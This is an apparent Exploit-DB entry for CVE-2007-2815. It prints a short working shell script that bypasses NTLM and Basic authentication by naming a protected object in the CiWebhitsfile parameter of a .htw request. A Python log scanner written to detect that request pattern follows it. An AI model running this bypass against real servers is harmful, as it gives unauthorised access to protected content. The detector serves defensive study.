vendor: Unknown
by: sha0[at]badchecksum.net
N/A
CVSS: N/A
Bypass vulnerability
Unknown
CWE
Product Name: Unknown
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: CVE-2007-2815
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested:
2007

NTLM && BASIC AUTH BYPASS

This script allows an attacker to bypass NTLM and Basic Authentication. It takes a site and a protected object as its two arguments, builds the URL <site>/shao/null.htw?CiWebhitsfile=<protected object>&CiRestriction=b&CiHiliteType=full, and fetches it with lynx -dump. The protected object is named in the CiWebhitsfile parameter of the .htw request instead of being requested directly, and that is how the request bypasses the authentication and reaches the object. The script is based on the vulnerability described in CVE-2007-2815.

Mitigation: Unknown

Exploit-DB raw data:

#!/bin/sh
#
# NTLM && BASIC AUTH BYPASS :)
#
# sha0[at]badchecksum.net
# Based on my adv: https://www.securityfocus.com/bid/24105/info   (CVE-2007-2815)

if [ $# != 2 ]
then
        printf "USAGE:\t\t$0 <Site> <Protected Object>\nExample:\t$0 http://www.microsoft.com  /en/us/default.aspx\n\n";
        exit 0
fi

site=$1
protectedObject=$2
evil=$site'/shao/null.htw?CiWebhitsfile='$protectedObject'&CiRestriction=b&CiHiliteType=full'
lynx -dump $evil

# milw0rm.com [2007-05-31]
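
A detection-side companion to the script above, added here as an example and not part of the original exploit or advisory: it scans web access logs for requests to a .htw path that carry a CiWebhitsfile parameter, which is the request shape the script builds. The Common Log Format input, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumption: Common Log Format lines, '... "METHOD target PROTO" status size'.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def inspect_line(line):
    """Return a finding for a .htw request carrying CiWebhitsfile, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # Decode and lowercase so NULL.HTW or null%2Ehtw are not missed.
    if not unquote(parts.path).lower().endswith(".htw"):
        return None
    # Parameter names are compared case-insensitively.
    query = {k.lower(): v for k, v in
             parse_qs(parts.query, keep_blank_values=True).items()}
    if "ciwebhitsfile" not in query:
        return None
    status = int(m.group("status"))
    return {
        "client": line.split(" ", 1)[0],
        "htw_path": parts.path,
        "requested_object": query["ciwebhitsfile"][0],
        "status": status,
        # A 200 means content was returned and the hit needs triage first.
        "served": status == 200,
    }


def scan(lines):
    """Collect findings from an iterable of access-log lines."""
    return [f for f in map(inspect_line, lines) if f is not None]


# Constructed sample log (documentation address ranges, made-up paths).
SAMPLE_LOG = """\
192.0.2.10 - - [31/May/2007:10:00:01 +0000] "GET /en/us/default.aspx HTTP/1.1" 401 1293
192.0.2.10 - - [31/May/2007:10:00:05 +0000] "GET /shao/null.htw?CiWebhitsfile=/en/us/default.aspx&CiRestriction=b&CiHiliteType=full HTTP/1.1" 200 5120
198.51.100.7 - - [31/May/2007:10:02:11 +0000] "GET /a/NULL.HTW?ciwebhitsfile=%2Fadmin%2Freport.asp&CiRestriction=x HTTP/1.0" 404 312
203.0.113.4 - - [31/May/2007:10:03:00 +0000] "GET /search.asp?q=htw HTTP/1.1" 200 800
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG.splitlines()):
        print(finding)
```

A finding whose requested object also appears in the same log with a 401 response, as in the first two sample lines, is the strongest signal to review.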